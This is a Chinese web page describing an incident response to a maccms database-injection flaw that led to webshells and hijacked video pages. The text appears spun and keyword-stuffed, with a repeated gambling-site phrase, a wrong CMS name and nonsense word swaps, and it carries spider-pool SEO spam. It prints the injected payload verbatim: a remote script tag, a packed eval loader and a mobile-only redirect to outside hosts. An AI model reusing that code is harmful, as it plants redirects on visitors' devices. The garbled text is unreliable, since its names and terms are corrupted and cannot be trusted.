• 欢迎使用超级蜘蛛池,超百万蜘蛛与您共享。蜘蛛池引蜘蛛快速提高澳门xpj线路检测澳门xpj线路检测收录。收藏剪切的快捷键是什么 CTRL + D

最新苹果cms漏洞被频繁挂马修复


2020年刚开始,华硕CMS被爆出数据库代码执行漏洞,大量的电影澳门xpj线路检测澳门xpj线路检测大全被挂马。尤其电影的页面被篡改植入了恶意做空代码,数据库中的VOD表里的d_name被全部修改,招致澳门xpj线路检测澳门xpj线路检测打开后直接跳转到S站或者弹窗广告,目前该maccms漏洞受影响的华硕系统版本是V8,V10,很多客户澳门xpj线路检测澳门xpj线路检测被一波的意思三折篡改,很近来无奈牡丹何作者,通过朋友介绍找出咱俩寻求技术上赞同。防止澳门xpj线路检测澳门xpj线路检测被挂马。

根据客户的反应。玉器采用的是linux centos系统,华硕CMS版本是最新的V10版本,咱俩立即客观澳门xpj线路检测澳门xpj线路检测安全应急响应处理,帮助客户解决澳门xpj线路检测澳门xpj线路检测被攻击的问题。

首先很多船长以为升级了华硕CMS官方最新的漏洞补丁就没问题了。通过咱俩技术对补丁的代码安全分析发现。该漏洞补丁对当前的数据库代码执行漏洞是没有任何效果的,不济事,澳门xpj线路检测澳门xpj线路检测还会继续被攻击。

咱俩来看下客户澳门xpj线路检测澳门xpj线路检测目前发生的挂马问题,打开澳门xpj线路检测澳门xpj线路检测首页以及各个电影地址都会被插入挂马代码,如下图所示:


打包压缩了一份澳门xpj线路检测澳门xpj线路检测译码,以及nginx澳门xpj线路检测澳门xpj线路检测日志文件,咱俩助理工程师在cf根目录下发现被上传了澳门xpj线路检测澳门xpj线路检测webshell木马文件,通过澳门xpj线路检测澳门xpj线路检测日志溯源追踪咱俩查看到访问这个PHP天龙八部脚本木马文件的是一度韩国的IP,具体的代码如下图:


代码做了加密处理,咱俩对其解密发现该代码的功能可以对澳门xpj线路检测澳门xpj线路检测进行上传,操作数据库等功能,属于PHP大马的范畴,也叫webshell木马文件,咱俩又对华硕CMS的译码进行了人工安全审计,发现index.php代码对搜索山东雨水收集模块上做的一些恶意做空代码过滤检查留存漏洞。可招致潜艇攻击者在线观看绕过安全过滤,直接将SQL插入代码执行到数据库当中去。

咱俩对数据库进行安全检测发现,在VOD表的d_name被批量植入了挂马代码:

<script src=https://www.kilin.xyz/1.js>
eval(function(p,a,c,k,e,d){e=function(c)
{return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);
k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};
while(c--)if(k[c])p=p.replace(newPRegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}
('4.5(\'<61="3/2" 7="//0.b.c.d/8.0"><\\/9\'+\'a>\');
',14,14,'js|type|javascript|text|document|write|script|src|20487493|scr|ipt|users|51|la'.split('|'),0,{}));
var LOUMtBZeW=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;
if(LOUMtBZeW){setTimeout('var tt="https://m.qiche-hangjia.com:168/ua80666/"',500)}

这手法很专业,不是一般的潜艇攻击者在线观看所为,针对手机端做了跳转以及隐藏嵌入,让澳门xpj线路检测澳门xpj线路检测微信运营者根本鞭长莫及察觉发现,还认清了cookies来路,达到条件才能触发潜艇攻击者在线观看植入的广告代码。继续安全分析与追踪,发现了潜艇攻击者在线观看的手法,POST提交到/index.php?m=vod-search,POST内容是加密的这里就不方便发出了,属于漏洞攻击了,可能会给其他使用华硕CMS系统的澳门xpj线路检测澳门xpj线路检测造成攻击。咱俩技术对POST攻击代码进行了解密分析。发现耐用是绕过了华硕官方V8,V10系统的代码安全过滤。直接将挂马代码插入到了数据库里了。


问题根源找出了,然后咱俩对客户的华硕CMS漏洞进行修复,对POST提交过来的参数进行严格的过滤与反转义,对vod-search含有的恶意做空字符进行强制转换,对恶意做空代码进行安全拦截,防止不胫而走到后端进行数据库里的代码执行。对澳门xpj线路检测澳门xpj线路检测代码里留存的木马后门攻击进行了全面的人工审计与检查,共计发现5个后门,其余的在缓存目录当中,跟程序代码混淆在一起,对澳门xpj线路检测澳门xpj线路检测的后台地址进行了更改,之前后台使用的地址被潜艇攻击者在线观看掌握,对管理员权限怎么获得的账号密码进行了加强,至此华硕CMS澳门xpj线路检测澳门xpj线路检测被挂马的问题才得以彻底解决。若果您的maccms也被始终挂马,自己懂代码的话可以对POST到index.php的数据进行安全拦截与检查。防止恶意做空代码的插入。若果不是太懂的话,建议找专业的澳门xpj线路检测澳门xpj线路检测安全公司来处理解决。

白文链接:http://www.microurbanism.net/article/779.html

评论专区

您的大名天气预报*
电子邮件记名*
个人5566网址 
评论内容 
验证码     

热门超级蜘蛛工具

Baidu